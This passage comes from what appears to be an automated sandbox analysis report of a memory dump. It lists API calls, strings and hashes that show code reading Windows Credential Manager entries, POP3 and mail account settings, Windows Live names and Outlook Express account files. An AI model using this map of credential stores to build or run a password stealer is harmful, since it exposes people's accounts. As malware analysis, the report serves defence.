                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                          • wcslen.MSVCRT ref: 0040874A
                                          • _wcsncoll.MSVCRT ref: 00408794
                                          • memset.MSVCRT ref: 0040882A
                                          • memcpy.MSVCRT ref: 00408849
                                          • wcschr.MSVCRT ref: 0040889F
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                          • String ID: J$Microsoft_WinInet
                                          • API String ID: 2203907242-260894208
                                          • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                          • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                          • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                          • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                          Function 004108E5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                                          Download Yara Rule
                                          APIs
                                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                          • memcpy.MSVCRT ref: 00410961
                                          Strings
                                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FromStringUuid$memcpy
                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                          • API String ID: 2859077140-2022683286
                                          • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                          • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                          • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                          • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                          Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                          • _mbscpy.MSVCRT ref: 00409686
                                          • _mbscpy.MSVCRT ref: 00409696
                                          • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                            • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                          • API String ID: 888011440-2039793938
                                          • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                          • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                          • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                          • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                          Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • database %s is already in use, xrefs: 0042E9CE
                                          • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                          • database is already attached, xrefs: 0042EA97
                                          • cannot ATTACH database within transaction, xrefs: 0042E966
                                          • too many attached databases - max %d, xrefs: 0042E951
                                          • unable to open database: %s, xrefs: 0042EBD6
                                          • out of memory, xrefs: 0042EBEF
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                          • API String ID: 1297977491-2001300268
                                          • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                          • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                          • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                          • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                          Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                          • strchr.MSVCRT ref: 0040327B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringstrchr
                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                          • API String ID: 1348940319-1729847305
                                          • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                          • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                          Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                          • API String ID: 3510742995-3273207271
                                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                          Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                          • memset.MSVCRT ref: 0040FA1E
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                          • _strnicmp.MSVCRT ref: 0040FA4F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                          • String ID: WindowsLive:name=*$windowslive:name=
                                          • API String ID: 945165440-3589380929
                                          • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                          • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                          • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                          • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                          Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                            • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                          • strchr.MSVCRT ref: 0040371F
                                          • _mbscpy.MSVCRT ref: 00403748
                                          • _mbscpy.MSVCRT ref: 00403758
                                          • strlen.MSVCRT ref: 00403778
                                          • sprintf.MSVCRT ref: 0040379C
                                          • _mbscpy.MSVCRT ref: 004037B2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                          • String ID: %s@gmail.com
                                          • API String ID: 500647785-4097000612
                                          • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                          • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                          • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                          • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                          Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004094C8
                                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                          • memset.MSVCRT ref: 0040950C
                                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                          • _strcmpi.MSVCRT ref: 00409531
                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                          • String ID: sysdatetimepick32
                                          • API String ID: 3411445237-4169760276
                                          • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                          • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                          • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                          • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                          Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                          • GetSysColor.USER32(0000000F), ref: 0040B472
                                          • DeleteObject.GDI32(?), ref: 0040B4A6
                                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                          • String ID:
                                          • API String ID: 3642520215-0
                                          • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                          • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                          • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                          • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                          Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                          • GetDC.USER32(00000000), ref: 004072FB
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                          • String ID:
                                          • API String ID: 1999381814-0
                                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                          Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                          • API String ID: 1297977491-3883738016
                                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                          Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                            • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                            • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                          • memcpy.MSVCRT ref: 0044972E
                                          • memcpy.MSVCRT ref: 0044977B
                                          • memcpy.MSVCRT ref: 004497F6
                                            • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                            • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                          • memcpy.MSVCRT ref: 00449846
                                          • memcpy.MSVCRT ref: 00449887
                                          • memcpy.MSVCRT ref: 004498B8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: gj
                                          • API String ID: 438689982-4203073231
                                          • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                          • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                          • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                          • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                          Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: __aulldvrm$__aullrem
                                          • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                          • API String ID: 643879872-978417875
                                          • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                          • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                          • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                          • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                          Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                          • memset.MSVCRT ref: 004058C3
                                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                          • SetFocus.USER32(?), ref: 00405976
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$FocusItemmemset
                                          • String ID:
                                          • API String ID: 4281309102-0
                                          • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                          • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                          • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                          • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                          Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                          • _mbscat.MSVCRT ref: 0040A8FF
                                          • sprintf.MSVCRT ref: 0040A921
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileWrite_mbscatsprintfstrlen
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 1631269929-4153097237
                                          • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                          • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                          • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                          • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                          Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040810E
                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,76DBEB20,?), ref: 004081B9
                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                          • API String ID: 524865279-2190619648
                                          • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                          • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                          • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                          • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                          Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                          • String ID: 0$6
                                          • API String ID: 2300387033-3849865405
                                          • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                          • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                          • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                          • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                          Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpystrlen$memsetsprintf
                                          • String ID: %s (%s)
                                          • API String ID: 3756086014-1363028141
                                          • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                          • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                          • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                          • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                          Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf
                                          • String ID: %2.2X
                                          • API String ID: 125969286-791839006
                                          • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                          • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                          • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                          • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                          Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                            • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                            • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
